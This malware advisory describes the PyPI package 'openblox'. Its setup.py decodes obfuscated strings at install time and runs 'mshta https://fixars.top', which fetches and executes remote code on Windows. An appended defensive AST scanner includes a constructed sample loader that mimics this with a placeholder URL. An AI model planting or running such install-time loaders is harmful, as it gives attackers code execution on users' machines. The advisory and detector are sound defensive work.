
MAL-2026-6504

Malicious code in openblox (PyPI)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (cdd874a78973f84b5373fc03a48472c338ca82ef0a258b7614f81a8359da1201)

setup.py invokes GetGitCommitHash() unconditionally at module top level, so it runs on `pip install openblox` (and any setuptools invocation). On Windows the function builds its command via two helpers (GetDefaultSystemPolicy, CalculateNodeDrift) that reconstruct strings from integer arrays using chr(byte + 14); the arrays decode to `mshta` and `https://fixars.top`. The resulting command is passed to subprocess.check_output with shell=True, causing Windows installers to launch `mshta https://fixars.top`. The mshta.exe Living-Off-The-Land binary downloads and executes remote HTA/JScript, giving the operator arbitrary code execution on the installer's machine. The obfuscation (chr-arithmetic with helper functions falsely named for hardware/latency diagnostics) exists solely to hide the URL and binary name from static scanners. The package additionally exhibits a cover-story shape: it is published under the name `openblox` with a Roblox-themed description, but the actual code is an unrelated `sqligen` SQLite utility, with placeholder author metadata (John / john@example.com / github.com/john/sqligen). The Roblox-library name appears chosen to attract installs intended for the legitimate openblox API library.
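As an added defensive example (not part of this advisory or of the package), the following Python statically scans a setup.py for the chr-arithmetic pattern described above and decodes the hidden strings without executing the file. The embedded sample setup.py is constructed: it reuses the helper names and the +14 offset from the advisory, but its second array decodes to a placeholder URL rather than the real indicator.

```python
import ast

# Constructed sample that mimics the shape the advisory describes (helper
# names and the +14 offset come from the advisory; the decoded URL is a
# placeholder, not the real indicator).
SAMPLE_SETUP_PY = '''
import subprocess

def GetDefaultSystemPolicy():
    return "".join(chr(b + 14) for b in [95, 101, 90, 102, 83])

def CalculateNodeDrift():
    return "".join([chr(b + 14) for b in [90, 102, 102, 98, 101, 44, 33, 33,
        87, 106, 83, 95, 98, 94, 87, 32, 91, 96, 104, 83, 94, 91, 86]])

subprocess.check_output(GetDefaultSystemPolicy() + " " + CalculateNodeDrift(), shell=True)
'''


def find_chr_arithmetic_strings(source):
    """Return sorted (line, decoded) pairs for every comprehension of the
    form chr(<var> + <int>) over a literal list of ints, decoded by
    inspecting the AST rather than running the file."""
    found = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, (ast.ListComp, ast.GeneratorExp)):
            continue
        elt, gen = node.elt, node.generators[0]
        # Element must be chr(<something> + <something>)
        if not (isinstance(elt, ast.Call) and isinstance(elt.func, ast.Name)
                and elt.func.id == "chr" and len(elt.args) == 1
                and isinstance(elt.args[0], ast.BinOp)
                and isinstance(elt.args[0].op, ast.Add)):
            continue
        operands = (elt.args[0].left, elt.args[0].right)
        offsets = [o.value for o in operands
                   if isinstance(o, ast.Constant) and isinstance(o.value, int)]
        if len(offsets) != 1 or not isinstance(gen.iter, ast.List):
            continue
        elts = gen.iter.elts
        if not all(isinstance(e, ast.Constant) and isinstance(e.value, int) for e in elts):
            continue
        try:
            decoded = "".join(chr(e.value + offsets[0]) for e in elts)
        except (ValueError, OverflowError):
            continue  # offset pushes a value outside the Unicode range
        found.append((node.lineno, decoded))
    return sorted(found)
```

Running the scanner over the sample yields the decoded `mshta` string and the placeholder URL, each with the line it was found on; flagging any hit that decodes to a known LOLBin name or a URL is a reasonable triage rule.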


Affected packages

PyPI / openblox

No fixed version published yet for openblox (pip). Pin to a known-safe version or switch to an alternative.

References